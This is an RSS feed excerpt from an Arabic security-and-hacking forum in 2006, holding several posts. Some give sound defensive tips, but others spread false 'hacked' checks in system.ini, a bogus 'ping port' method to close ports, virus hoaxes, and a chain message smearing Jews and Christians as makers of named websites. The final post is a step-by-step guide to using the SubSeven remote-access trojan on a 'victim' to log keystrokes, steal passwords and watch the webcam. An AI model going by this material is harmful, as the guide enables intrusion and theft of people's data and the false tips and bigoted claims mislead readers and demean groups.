			<link>https://kwety.net/vb/showthread.php?t=25537&amp;goto=newpost</link>
			<pubDate>Sun, 16 Jul 2006 20:54:57 GMT</pubDate>
			<description><![CDATA[[GRADE="00008B FF6347 008000 4B0082"]السلام عليكم

احذر يا مستخدم ويندوز اكس بي من تشغيل هذا العنصر Remote Registry عندما تعمل على الانترنت. 

اين تجد هذا العنصر ؟ 
start ... ابداء
control panel ..... لوحة التحكم
administrative tools .....ادوات إدارية
services ..... خدمات

ستفتح لك نافذة الخدمات ستجد فى الجهة اليمنى من النافذة قائمة طويلة باسماء الخدمات العاملة في النظام ومرتبة هجائيا - ابحث فيها عن العنصر Remote Registry 

كليك يمين 
STOP ...اذا كان مفعل وقف تفعيلة

كليك يمين 
PROPERTIES 

ستفتح لك نافذة الخصائص لهذا العنصرGeneral 
ومن خانة Startup type 
اختر Disabled 

ثم OK 

هذا العنصر مهمته اتاحة الفرصة للهاكرز لتغيير الريجيستري للويندوز[/GRADE]
]]></description>
			<content:encoded><![CDATA[<div><div align="center"><font size="5">[GRADE=&quot;00008B FF6347 008000 4B0082&quot;]السلام عليكم<br />
<br />
احذر يا مستخدم ويندوز اكس بي من تشغيل هذا العنصر Remote Registry عندما تعمل على الانترنت. <br />
<br />
اين تجد هذا العنصر ؟ <br />
start ... ابداء<br />
control panel ..... لوحة التحكم<br />
administrative tools .....ادوات إدارية<br />
services ..... خدمات<br />
<br />
ستفتح لك نافذة الخدمات ستجد فى الجهة اليمنى من النافذة قائمة طويلة باسماء الخدمات العاملة في النظام ومرتبة هجائيا - ابحث فيها عن العنصر Remote Registry <br />
<br />
كليك يمين <br />
STOP ...اذا كان مفعل وقف تفعيلة<br />
<br />
كليك يمين <br />
PROPERTIES <br />
<br />
ستفتح لك نافذة الخصائص لهذا العنصرGeneral <br />
ومن خانة Startup type <br />
اختر Disabled <br />
<br />
ثم OK <br />
<br />
هذا العنصر مهمته اتاحة الفرصة للهاكرز لتغيير الريجيستري للويندوز[/GRADE]</font></div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>حبيب الجميع</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=25537</guid>
		</item>
		<item>
			<title>هل تريد ان تعرف اذا جهازك مخترقا م لا ....ادخل هنا</title>
			<link>https://kwety.net/vb/showthread.php?t=25536&amp;goto=newpost</link>
			<pubDate>Sun, 16 Jul 2006 20:43:36 GMT</pubDate>
			<description>موقع يجعلك تعرف اذا جهازك مخترق او لا
ميزة الموقع رائعة فى الكشف عما إذا كان جهازك مخترق أم لا ..؟ وهو يظهر فى نفس الوقت مدى كفاءة الجدار الناري (fire wall) الذى لديك. 
أما إذا لم يكن لديك جدار ناري فستجد العجب وتعرف اين يخترق جهازك.

فإذا كان المدخل مفتوح أى مخترق ستجد كلمة OPEN باللون الأحمر.
وإذا كان المدخل مغلق (أى أنه يمكن الوصول إليه ولكنه لم يخترق بعد) فستجد كلمة CLOSED باللون الأصفر.
أما إذا كان الجدار الناري لديك قوي ولا يسمح بالأختراق فستجد كلمة SECURE باللون الأخضر وهي عبارة عن أن المداخل لديك آمن ومضون بوجه اي أختراق. وستلاحظ في النهارية العبارة التالية أسفل الصفحة: Test complete اي ان الاختبار انتهى.
  اضغط هنا للدخول الى الموقع (http://probe.hackerwatch.org/probe/probe.asp)



                           منقول للأمانة</description>
			<content:encoded><![CDATA[<div><div align="center"><font size="5">موقع يجعلك تعرف اذا جهازك مخترق او لا<br />
ميزة الموقع رائعة فى الكشف عما إذا كان جهازك مخترق أم لا ..؟ وهو يظهر فى نفس الوقت مدى كفاءة الجدار الناري (fire wall) الذى لديك. <br />
أما إذا لم يكن لديك جدار ناري فستجد العجب وتعرف اين يخترق جهازك.<br />
<br />
فإذا كان المدخل مفتوح أى مخترق ستجد كلمة OPEN باللون الأحمر.<br />
وإذا كان المدخل مغلق (أى أنه يمكن الوصول إليه ولكنه لم يخترق بعد) فستجد كلمة CLOSED باللون الأصفر.<br />
أما إذا كان الجدار الناري لديك قوي ولا يسمح بالأختراق فستجد كلمة SECURE باللون الأخضر وهي عبارة عن أن المداخل لديك آمن ومضون بوجه اي أختراق. وستلاحظ في النهارية العبارة التالية أسفل الصفحة: Test complete اي ان الاختبار انتهى.<br />
<a href="http://probe.hackerwatch.org/probe/probe.asp" target="_blank">  اضغط هنا للدخول الى الموقع</a></font></div><br />
<br />
<br />
                           منقول للأمانة</div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>حبيب الجميع</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=25536</guid>
		</item>
		<item>
			<title>كيف تعرف ان جهازك مخترق؟؟ تفضل هنا</title>
			<link>https://kwety.net/vb/showthread.php?t=25526&amp;goto=newpost</link>
			<pubDate>Sun, 16 Jul 2006 16:27:33 GMT</pubDate>
			<description><![CDATA[السلام عليكم ورحمة الله وبركاته 


كيف تعرف أن جهازك اخترق من أي شخص طبعاَ في بعض الناس يقولون والله اخترق جهازي والله صار كذا والله ما ادري إيش في الجهاز طبعا كلها أقاويل ناجمة عن احتمالات
لكن أنا بقول لكم طريقه بدون برامج وبدون انترنت وبدون أي شيء خارج الجهاز وهي فعالة ودقيقة وصحيحة 100%

فإليكم الطريقة :

ويندوز 98 + ME


من قائمة أبدا أو start

افتح تشغيل أو Run
ثم
اكتب التالي : system.ini

ستظهر لك صفحة أذهب للسطر الخامس فيها
إذا كان السطر هكذا .
user.exe=user.exe
فإعلم أن جهازك ما فيه إلا العافية ولم يتم اختراقه

أم إن كان السطر هكذا
user.exe=user.exe *** *** ***
فإعلم أن جهازك قد تم اختراقه بظهور النجوم التي في الأعلى
وأسرع باتخاذ التدابير اللازمة وشيل ملفاتك الخاصة 
قبل ما يخربون ويلعبون بملفاتك


************************************************** ***************************** 

ويندوز 2000 + XP

من قائمة أبدا أو start

افتح تشغيل أو Run
ثم
اكتب التالي : system.ini
أما الاكس بي إذا ظهر لك كذا
هذا الرسالة معناها جهازك سليم ولم يتم اختراقه 
لكن إذا ظهر لك مثل كذا
; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]
[driver32]
[386enh]
woafont=dosapp.FON
EGA80WOA.FON=EGA80850.FON
EGA40WOA.FON=EGA40850.FON
CGA80WOA.FON=CGA80850.FON
CGA40WOA.FON=CGA40850.FON

************************************************** *****
************************************************** *****

; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv*** *** ***

[mci]
[driver32]
[386enh]
woafont=dosapp.FON
EGA80WOA.FON=EGA80850.FON
EGA40WOA.FON=EGA40850.FON
CGA80WOA.FON=CGA80850.FON
CGA40WOA.FON=CGA40850.FON

الفرق بين الرسالتين لاحظوا في السطر الرابع في كل رسالة الرسالة الأولى لاتوجد بجانب الكتابة نجوم في السطر الرابع فمعناه إن جهازك سليم
أما إذا ظهرت نجوم فمعناها أن الجهاز تم إختراقه
لا حظ النجوم 
إذا لم ترها فجهازك بحاله جيده ..

تقبلوا تحياتي
]]></description>
			<content:encoded><![CDATA[<div><div align="center"><font size="4">السلام عليكم ورحمة الله وبركاته <br />
<br />
<br />
كيف تعرف أن جهازك اخترق من أي شخص طبعاَ في بعض الناس يقولون والله اخترق جهازي والله صار كذا والله ما ادري إيش في الجهاز طبعا كلها أقاويل ناجمة عن احتمالات<br />
لكن أنا بقول لكم طريقه بدون برامج وبدون انترنت وبدون أي شيء خارج الجهاز وهي فعالة ودقيقة وصحيحة 100%<br />
<br />
فإليكم الطريقة :<br />
<br />
ويندوز 98 + ME<br />
<br />
<br />
من قائمة أبدا أو start<br />
<br />
افتح تشغيل أو Run<br />
ثم<br />
اكتب التالي : system.ini<br />
<br />
ستظهر لك صفحة أذهب للسطر الخامس فيها<br />
إذا كان السطر هكذا .<br />
user.exe=user.exe<br />
فإعلم أن جهازك ما فيه إلا العافية ولم يتم اختراقه<br />
<br />
أم إن كان السطر هكذا<br />
user.exe=user.exe *** *** ***<br />
فإعلم أن جهازك قد تم اختراقه بظهور النجوم التي في الأعلى<br />
وأسرع باتخاذ التدابير اللازمة وشيل ملفاتك الخاصة <br />
قبل ما يخربون ويلعبون بملفاتك<br />
<br />
<br />
************************************************** ***************************** <br />
<br />
ويندوز 2000 + XP<br />
<br />
من قائمة أبدا أو start<br />
<br />
افتح تشغيل أو Run<br />
ثم<br />
اكتب التالي : system.ini<br />
أما الاكس بي إذا ظهر لك كذا<br />
هذا الرسالة معناها جهازك سليم ولم يتم اختراقه <br />
لكن إذا ظهر لك مثل كذا<br />
; for 16-bit app support<br />
[drivers]<br />
wave=mmdrv.dll<br />
timer=timer.drv<br />
<br />
[mci]<br />
[driver32]<br />
[386enh]<br />
woafont=dosapp.FON<br />
EGA80WOA.FON=EGA80850.FON<br />
EGA40WOA.FON=EGA40850.FON<br />
CGA80WOA.FON=CGA80850.FON<br />
CGA40WOA.FON=CGA40850.FON<br />
<br />
************************************************** *****<br />
************************************************** *****<br />
<br />
; for 16-bit app support<br />
[drivers]<br />
wave=mmdrv.dll<br />
timer=timer.drv*** *** ***<br />
<br />
[mci]<br />
[driver32]<br />
[386enh]<br />
woafont=dosapp.FON<br />
EGA80WOA.FON=EGA80850.FON<br />
EGA40WOA.FON=EGA40850.FON<br />
CGA80WOA.FON=CGA80850.FON<br />
CGA40WOA.FON=CGA40850.FON<br />
<br />
الفرق بين الرسالتين لاحظوا في السطر الرابع في كل رسالة الرسالة الأولى لاتوجد بجانب الكتابة نجوم في السطر الرابع فمعناه إن جهازك سليم<br />
أما إذا ظهرت نجوم فمعناها أن الجهاز تم إختراقه<br />
لا حظ النجوم <br />
إذا لم ترها فجهازك بحاله جيده ..<br />
<br />
تقبلوا تحياتي</font></div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>حبيب الجميع</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=25526</guid>
		</item>
		<item>
			<title>كيف تغلق جميع البورتات اللي في جهازك لمواجهة الهكر</title>
			<link>https://kwety.net/vb/showthread.php?t=25525&amp;goto=newpost</link>
			<pubDate>Sun, 16 Jul 2006 16:24:56 GMT</pubDate>
			<description><![CDATA[[GRADE="FFA500 FF6347 008000 4B0082"]السلام عليكم 

هل تعانون من هجوم الهكر 

ان الكثير من برامج الهكر تعتمد اعتماد على البورتات المفتوحة في الجهاز... 
ولن هل انت متأكد من ان جهازك لا يوجد فية بورتات مفتوحة ....... 

ان لم تكون متأكد فاتبع الطريقة التالية وامنع الهكر من الهجوم عليك 
******************* 

اقدم لكم هذه الطريقه التى عن طريقها تستطيع تقفيل جميع البورتات ( الثغرات الامنيه ) الموجوده بكل الاجهزه . 

اتمنى اتباع الطريقه كما هي : 
إذهب إلى: 
Start>Run ابداء < تشغيل 
------------------------------------------ 

واكتب الامر التالي 
command.com 

ستظهر لك نافذة إكتب فيها: 
ping host 

و إضغط enter ثم إنتظر و اكتب: 
ping port 

و إضغط enter 

ثم إنتظر و اكتب: 
ping port1027 
وإضغط enter 
و إنتظر ثم إكتب: 
ping port80 

و إضغط enter 
ثم اكتب: 
ping proxy 
و إضغط enter 

ثم اكتب: 
ping port 
و إضغط enter 

و الآن إنتهت المهمة.. لقد قمت بتقفيل بورت في البروكسي الخاص بك و لقد تم منع دخول الهاكرز من تلك الثغرة الأمنية 

ملاحظه 

لكني انصح الاخوة ممن لا خبرة لديهم فى الجهاز عدم استعمال تلك الطريقة 

لانها قد تؤدي الى مشاكل فنية كبيرة فى حال حصول خطاء صغير واحد 

الطريقة الاسلم هو انزال برامج مثل كاسبر سكاي أنتي هكر Kaspersky Anti-Hacker أو زون الارم zone alarm


تحياتى للجميع [/GRADE]
]]></description>
			<content:encoded><![CDATA[<div><div align="center"><font size="5">[GRADE=&quot;FFA500 FF6347 008000 4B0082&quot;]السلام عليكم <br />
<br />
هل تعانون من هجوم الهكر <br />
<br />
ان الكثير من برامج الهكر تعتمد اعتماد على البورتات المفتوحة في الجهاز... <br />
ولن هل انت متأكد من ان جهازك لا يوجد فية بورتات مفتوحة ....... <br />
<br />
ان لم تكون متأكد فاتبع الطريقة التالية وامنع الهكر من الهجوم عليك <br />
******************* <br />
<br />
اقدم لكم هذه الطريقه التى عن طريقها تستطيع تقفيل جميع البورتات ( الثغرات الامنيه ) الموجوده بكل الاجهزه . <br />
<br />
اتمنى اتباع الطريقه كما هي : <br />
إذهب إلى: <br />
Start&gt;Run ابداء &lt; تشغيل <br />
------------------------------------------ <br />
<br />
واكتب الامر التالي <br />
command.com <br />
<br />
ستظهر لك نافذة إكتب فيها: <br />
ping host <br />
<br />
و إضغط enter ثم إنتظر و اكتب: <br />
ping port <br />
<br />
و إضغط enter <br />
<br />
ثم إنتظر و اكتب: <br />
ping port1027 <br />
وإضغط enter <br />
و إنتظر ثم إكتب: <br />
ping port80 <br />
<br />
و إضغط enter <br />
ثم اكتب: <br />
ping proxy <br />
و إضغط enter <br />
<br />
ثم اكتب: <br />
ping port <br />
و إضغط enter <br />
<br />
و الآن إنتهت المهمة.. لقد قمت بتقفيل بورت في البروكسي الخاص بك و لقد تم منع دخول الهاكرز من تلك الثغرة الأمنية <br />
<br />
ملاحظه <br />
<br />
لكني انصح الاخوة ممن لا خبرة لديهم فى الجهاز عدم استعمال تلك الطريقة <br />
<br />
لانها قد تؤدي الى مشاكل فنية كبيرة فى حال حصول خطاء صغير واحد <br />
<br />
الطريقة الاسلم هو انزال برامج مثل كاسبر سكاي أنتي هكر Kaspersky Anti-Hacker أو زون الارم zone alarm<br />
<br />
<br />
تحياتى للجميع [/GRADE]</font></div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>حبيب الجميع</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=25525</guid>
		</item>
		<item>
			<title>الرجاء اتخاد الحذر من المواقع التالية</title>
			<link>https://kwety.net/vb/showthread.php?t=25523&amp;goto=newpost</link>
			<pubDate>Sun, 16 Jul 2006 16:06:23 GMT</pubDate>
			<description><![CDATA[[GRADE="00BFFF 4169E1 0000FF"]الرجاء اتخاد الحذر من المواقع التالية 
: plz make sure u dun use this islamic sites 
www.answering-islam.org 
www.aboutislam.com 
www.thequran.com 
www.Allahassurance.com 
هذه المواقع على الأنترنت أصدرها اليهود الإسرائليون في محاولة لهم نشر معلومات زائفة
عن الإسلام و القرآن و الحديث على الصعيد العالمي. الرجاء المساهمة في نشر هذا البيان
التوضيحي على أوسع نطاق ممكن. 
those sites were published by israelians,jews n kristians to spread nonesense about
islam n information that gives bad idea about islam... plz help in to stop all
that... n send this email to all ppl u know... 
هنالك أشخاص يقومون بإرسال 
شاشة توقف أو حافظة شاشة 
SCREEN SAVER 
بها ضفادع بإسم 
Budweiser Frogs 
إذا قمت بتحميل هذه الشاشة في جهازك فسيقوم بتدمير القرص الصلب.. 
لا تقم بتحميلها تحت أي ظرف أو ضغط.. 
هذا يعتبر فيروس جديد.. والكثيرون لايعرفون عنه شيء. 
قم بإبلاغ أصدقائك بأسرع وقت ممكن 
وهو فيروس خطير جد ولا يوجد له مكافحة حالياً 
============================= 
كن حذرا فهناك فايرس ظهر حديثا يقوم بمسح الدرايف سي 
فإذا وصلتك رسالة تحمل هذا العنوان 
"Economic Slow Down in US " 
فعليك حذف الرسالة فورا.. أما إذا فتحتها فسيقول لك 
"Your system will restart now. do you want to continue" 

وحتى إذا اخترت " لا" فسيقوم باغلاق جهازك ولن تستطيع تشغيله مره اخرى 
حاول ارسال هذا التحذير لأكبر عدد ممكن 
ونشره على اكبر نطاق ممكن 
حتى يتجنبوا أخطار هذا الفايرس 
============================ 
يوجد فيروس جديد أكتشف حديثا و عمله هو حذف جميع محتويات القرص الصلب . اذا وصلك ايميل
بعنوان 
"Osama Vs Bush", 
أحذفه فورا ، عند فتحه سوف يسألك السؤال التالي 
will this war affect the world economy?". 
هل سوف تؤثر هذه الحرب على إقتصاد العالم ؟ 
و يوجد عدة أزره اذا ضغطت على أحدها سوف يتم ايقاف النظام عندك و لن تستطيع تشغيله مره
أخرى .....و قد سبب هذا الفيروس عدة مشاكل في أمريكا و الهند و بعض مناطق العالم 
الرجاء إعادة ارسال هذه الرسالة الى أقصى عدد من الناس لأخذ الحذر و الحيطة 
ــــــــــــــــــــــــــــــــــــــــــــــــــ 


وماعلى الرسول الا البلاغ
رجاءا نشر هذا التحذير لمن تعرف[/GRADE]
]]></description>
			<content:encoded><![CDATA[<div><div align="center"><font size="5">[GRADE=&quot;00BFFF 4169E1 0000FF&quot;]الرجاء اتخاد الحذر من المواقع التالية <br />
: plz make sure u dun use this islamic sites <br />
<a href="http://www.answering-islam.org" target="_blank">www.answering-islam.org</a> <br />
<a href="http://www.aboutislam.com" target="_blank">www.aboutislam.com</a> <br />
<a href="http://www.thequran.com" target="_blank">www.thequran.com</a> <br />
<a href="http://www.Allahassurance.com" target="_blank">www.Allahassurance.com</a> <br />
هذه المواقع على الأنترنت أصدرها اليهود الإسرائليون في محاولة لهم نشر معلومات زائفة<br />
عن الإسلام و القرآن و الحديث على الصعيد العالمي. الرجاء المساهمة في نشر هذا البيان<br />
التوضيحي على أوسع نطاق ممكن. <br />
those sites were published by israelians,jews n kristians to spread nonesense about<br />
islam n information that gives bad idea about islam... plz help in to stop all<br />
that... n send this email to all ppl u know... <br />
هنالك أشخاص يقومون بإرسال <br />
شاشة توقف أو حافظة شاشة <br />
SCREEN SAVER <br />
بها ضفادع بإسم <br />
Budweiser Frogs <br />
إذا قمت بتحميل هذه الشاشة في جهازك فسيقوم بتدمير القرص الصلب.. <br />
لا تقم بتحميلها تحت أي ظرف أو ضغط.. <br />
هذا يعتبر فيروس جديد.. والكثيرون لايعرفون عنه شيء. <br />
قم بإبلاغ أصدقائك بأسرع وقت ممكن <br />
وهو فيروس خطير جد ولا يوجد له مكافحة حالياً <br />
============================= <br />
كن حذرا فهناك فايرس ظهر حديثا يقوم بمسح الدرايف سي <br />
فإذا وصلتك رسالة تحمل هذا العنوان <br />
&quot;Economic Slow Down in US &quot; <br />
فعليك حذف الرسالة فورا.. أما إذا فتحتها فسيقول لك <br />
&quot;Your system will restart now. do you want to continue&quot; <br />
<br />
وحتى إذا اخترت &quot; لا&quot; فسيقوم باغلاق جهازك ولن تستطيع تشغيله مره اخرى <br />
حاول ارسال هذا التحذير لأكبر عدد ممكن <br />
ونشره على اكبر نطاق ممكن <br />
حتى يتجنبوا أخطار هذا الفايرس <br />
============================ <br />
يوجد فيروس جديد أكتشف حديثا و عمله هو حذف جميع محتويات القرص الصلب . اذا وصلك ايميل<br />
بعنوان <br />
&quot;Osama Vs Bush&quot;, <br />
أحذفه فورا ، عند فتحه سوف يسألك السؤال التالي <br />
will this war affect the world economy?&quot;. <br />
هل سوف تؤثر هذه الحرب على إقتصاد العالم ؟ <br />
و يوجد عدة أزره اذا ضغطت على أحدها سوف يتم ايقاف النظام عندك و لن تستطيع تشغيله مره<br />
أخرى .....و قد سبب هذا الفيروس عدة مشاكل في أمريكا و الهند و بعض مناطق العالم <br />
الرجاء إعادة ارسال هذه الرسالة الى أقصى عدد من الناس لأخذ الحذر و الحيطة <br />
ــــــــــــــــــــــــــــــــــــــــــــــــــ <br />
<br />
<br />
وماعلى الرسول الا البلاغ<br />
رجاءا نشر هذا التحذير لمن تعرف[/GRADE]</font></div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>حبيب الجميع</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=25523</guid>
		</item>
		<item>
			<title>اختبر قوة برنامج الحماية الذي في جهازك بثواني.....</title>
			<link>https://kwety.net/vb/showthread.php?t=25522&amp;goto=newpost</link>
			<pubDate>Sun, 16 Jul 2006 15:59:51 GMT</pubDate>
			<description><![CDATA[بسم الله الرحمن الرحيم 

هذا اختبار لقوة برنامج حماية الفايروسات الموجود بجهازك 

اضغط بزر الفارة اليمين على اي مكان فاضي بسطح المكتب واختار

جديد + مستند نص......ثم انسخ الاتي والصقه داخل المستند


X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* 


ثم قم بحفظ المستند باي اسم ......مثل test

او احفظه كما هو باسم مستند نصي جديد

هذا ليس بفايروس وإنما اختبار لبرنامج الفايروسات الذي لديك فإن اكتشفه قبل أن

تحفظه فبرنامجك ممتاز وإن سمح لك بحفظه فبرنامجك ( أخرطي ) 

وهذي صورة من تجربتي
[IMG]صورة: http://www.c5c6.com/File/1153066410.gif  (http://www.c5c6.com)[/IMG]

والله الموفق
]]></description>
			<content:encoded><![CDATA[<div><div align="center">بسم الله الرحمن الرحيم <br />
<br />
هذا اختبار لقوة برنامج حماية الفايروسات الموجود بجهازك <br />
<br />
اضغط بزر الفارة اليمين على اي مكان فاضي بسطح المكتب واختار<br />
<br />
جديد + مستند نص......ثم انسخ الاتي والصقه داخل المستند<br />
<br />
<br />
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* <br />
<br />
<br />
ثم قم بحفظ المستند باي اسم ......مثل test<br />
<br />
او احفظه كما هو باسم مستند نصي جديد<br />
<br />
هذا ليس بفايروس وإنما اختبار لبرنامج الفايروسات الذي لديك فإن اكتشفه قبل أن<br />
<br />
تحفظه فبرنامجك ممتاز وإن سمح لك بحفظه فبرنامجك ( أخرطي ) <br />
<br />
وهذي صورة من تجربتي<br />
[IMG]<a href="http://www.c5c6.com" target="_blank"><img src="http://www.c5c6.com/File/1153066410.gif" border="0" alt="" /></a>[/IMG]<br />
<br />
والله الموفق</div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>حبيب الجميع</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=25522</guid>
		</item>
		<item>
			<title>تعلم الاختراق بالسب سفن</title>
			<link>https://kwety.net/vb/showthread.php?t=25306&amp;goto=newpost</link>
			<pubDate>Thu, 13 Jul 2006 21:07:59 GMT</pubDate>
			<description>السلام عليكم و رحمة الله و بركاته




أولاً : رقم IP 

يجب أن يكون لديك رقم IP لشخص يوجد في كمبيوتره BACK DOOR 

(مشغل السيرفر)

ثانياً: كيف تدخل على جهاز الضحية

بعد ما تحصل على رقم IP ضعه في المكان المخصص للـ IP مثل:

صورة: http://www.kwety.net/kwety1/q89/nowsub1.jpg 

يجب وضع رقم IP في مكان كتبة روما ثم اختيار PORT مناسب كما في

 الصورة السابقة

ثالثاً: كيف تختار الـ PORT

اختيار البورت يتم عن طريق برنامج يكشف البورت لك (مثل Port Scan 

او غيره) ، ويوجد لبرنامج السب سفن بورت خاص له وهو 1243 ، او 

27374. 

رابعاً: طريقة الدخول

بعد وضع رقم الـ IP والـ PORT اضغط على Connect، مثل:

صورة: http://www.kwety.net/kwety1/q89/nowsub2.jpg 

ويجب الانتظار عدة ثواني (مابين 5 و 15 ثانية) ، بعدها سوف يظهر لك في

 الاسفل(status bar) كتابه تشير الى ان العملية نجحت، ويظهر لك كتابه 

مثل (connected to 127.0.0.1) 

الأدوات:

صورة: http://www.kwety.net/kwety1/q89/nowsub3.jpg 

1- الـconnection: 

- هذا القسم يوجد به IP Scanner الذي يمكنك

Info: الذي يمكنك من معرفه معلومات عن جهاز الضحية . 

- Get Home Info: الذي يعطيك معلومات عن منزل و ايميل ورقم الضحية 

(ملاحظة هذا لا يعمل الا مع السيرفر الجديد اصدار 2.1) . 

- Server option: الذي يمكنك من تغيير البورت للضحية وتطوير وحذف

 وتوقيف السيرفر لدى الضحية . 

- IP notify: الذي يمكنك من معرفة الضحية اذا دخل الانترنت او لا، حيث 

يرسل لك رساله بالايسكيو او الايميل او بالايرسي. 

2- الـ Keys/messages: 

- Keyboard: يمكنك من معرفه ما يكتب الضحية. 

- Chat: يمكنك من محادثة الضحية ولا يستطيع الهروب منك (يحزن). 

- msg manegar: يمكنك من ارسال رساله (خدعه) للضحية . 

- ICQ Take Over: تستطيع حذف اي رقم ايسكيو لدى الضحية . 

3- الـ Asvansed: 

تستطيع سرقة Password اشتراكه أو أي Password مسجل بالكمبيوتر 

4- الـ miscellaneous: 

- File manegar: تستطيع من استكشاف ملفات الضحية واللعب بها : 

- windows manegar: تستطيع معرفه البرامج المشغله لدى الضحية ،

 ويمكنك اغلاق اي برنامج تريد . 

5- الـfun manegar: 

- desktop/webcam: يمكنك منن مشاهده شاشه الضحية ، وحتى يمكن 

تشغيل كامرته اذا كانت لديه كامره. 

- flip screen: يمكنك من قلب شاشه الضحيه واللعب بها : 

- print: يمكنك من طباعه اي شي تريده. 

- browser: يمكنك من تشغيل اكسبلورر مع اختيار الموقع الذي تريده ان 

يدخله للضحية . 

- win color: يمكن من تغيير الوان الويندوز لدى الضحية . 

6- الـ Extra Fun: 

- screen saver: يمكنك من تشغيل شاشه التوقف للضحيه مع وضع 

رساله له. 
- restart win: يمكنك من اعادة تشغيل جهاز الضحية، واغلاقه. 

- mouse: يمكنك من اللعب بالماوس لدى الضحية . 

- sound: يمكنك من التحكم بالصوت لدى الضحية . 

- Extra: يمكنك من تشغيل صوت مزعج يخيف الضحية، و فتح وغلق الـ 

CD room , وغلق شاشته وله وظائف أخرى


البرنامــــــــــــــج فـــــــى المرفقــــــــات
</description>
			<content:encoded><![CDATA[<div><div align="center"><font color="Navy">السلام عليكم و رحمة الله و بركاته<br />
<br />
<br />
<br />
<br />
أولاً : رقم IP <br />
<br />
يجب أن يكون لديك رقم IP لشخص يوجد في كمبيوتره BACK DOOR <br />
<br />
(مشغل السيرفر)<br />
<br />
ثانياً: كيف تدخل على جهاز الضحية<br />
<br />
بعد ما تحصل على رقم IP ضعه في المكان المخصص للـ IP مثل:<br />
<br />
<img src="http://www.kwety.net/kwety1/q89/nowsub1.jpg" border="0" alt="" /><br />
<br />
يجب وضع رقم IP في مكان كتبة روما ثم اختيار PORT مناسب كما في<br />
<br />
 الصورة السابقة<br />
<br />
ثالثاً: كيف تختار الـ PORT<br />
<br />
اختيار البورت يتم عن طريق برنامج يكشف البورت لك (مثل Port Scan <br />
<br />
او غيره) ، ويوجد لبرنامج السب سفن بورت خاص له وهو 1243 ، او <br />
<br />
27374. <br />
<br />
رابعاً: طريقة الدخول<br />
<br />
بعد وضع رقم الـ IP والـ PORT اضغط على Connect، مثل:<br />
<br />
<img src="http://www.kwety.net/kwety1/q89/nowsub2.jpg" border="0" alt="" /><br />
<br />
ويجب الانتظار عدة ثواني (مابين 5 و 15 ثانية) ، بعدها سوف يظهر لك في<br />
<br />
 الاسفل(status bar) كتابه تشير الى ان العملية نجحت، ويظهر لك كتابه <br />
<br />
مثل (connected to 127.0.0.1) <br />
<br />
الأدوات:<br />
<br />
<img src="http://www.kwety.net/kwety1/q89/nowsub3.jpg" border="0" alt="" /><br />
<br />
1- الـconnection: <br />
<br />
- هذا القسم يوجد به IP Scanner الذي يمكنك<br />
<br />
Info: الذي يمكنك من معرفه معلومات عن جهاز الضحية . <br />
<br />
- Get Home Info: الذي يعطيك معلومات عن منزل و ايميل ورقم الضحية <br />
<br />
(ملاحظة هذا لا يعمل الا مع السيرفر الجديد اصدار 2.1) . <br />
<br />
- Server option: الذي يمكنك من تغيير البورت للضحية وتطوير وحذف<br />
<br />
 وتوقيف السيرفر لدى الضحية . <br />
<br />
- IP notify: الذي يمكنك من معرفة الضحية اذا دخل الانترنت او لا، حيث <br />
<br />
يرسل لك رساله بالايسكيو او الايميل او بالايرسي. <br />
<br />
2- الـ Keys/messages: <br />
<br />
- Keyboard: يمكنك من معرفه ما يكتب الضحية. <br />
<br />
- Chat: يمكنك من محادثة الضحية ولا يستطيع الهروب منك (يحزن). <br />
<br />
- msg manegar: يمكنك من ارسال رساله (خدعه) للضحية . <br />
<br />
- ICQ Take Over: تستطيع حذف اي رقم ايسكيو لدى الضحية . <br />
<br />
3- الـ Asvansed: <br />
<br />
تستطيع سرقة Password اشتراكه أو أي Password مسجل بالكمبيوتر <br />
<br />
4- الـ miscellaneous: <br />
<br />
- File manegar: تستطيع من استكشاف ملفات الضحية واللعب بها : <br />
<br />
- windows manegar: تستطيع معرفه البرامج المشغله لدى الضحية ،<br />
<br />
 ويمكنك اغلاق اي برنامج تريد . <br />
<br />
5- الـfun manegar: <br />
<br />
- desktop/webcam: يمكنك منن مشاهده شاشه الضحية ، وحتى يمكن <br />
<br />
تشغيل كامرته اذا كانت لديه كامره. <br />
<br />
- flip screen: يمكنك من قلب شاشه الضحيه واللعب بها : <br />
<br />
- print: يمكنك من طباعه اي شي تريده. <br />
<br />
- browser: يمكنك من تشغيل اكسبلورر مع اختيار الموقع الذي تريده ان <br />
<br />
يدخله للضحية . <br />
<br />
- win color: يمكن من تغيير الوان الويندوز لدى الضحية . <br />
<br />
6- الـ Extra Fun: <br />
<br />
- screen saver: يمكنك من تشغيل شاشه التوقف للضحيه مع وضع <br />
<br />
رساله له. <br />
- restart win: يمكنك من اعادة تشغيل جهاز الضحية، واغلاقه. <br />
<br />
- mouse: يمكنك من اللعب بالماوس لدى الضحية . <br />
<br />
- sound: يمكنك من التحكم بالصوت لدى الضحية . <br />
<br />
- Extra: يمكنك من تشغيل صوت مزعج يخيف الضحية، و فتح وغلق الـ <br />
<br />
CD room , وغلق شاشته وله وظائف أخرى<br />
<br />
<br />
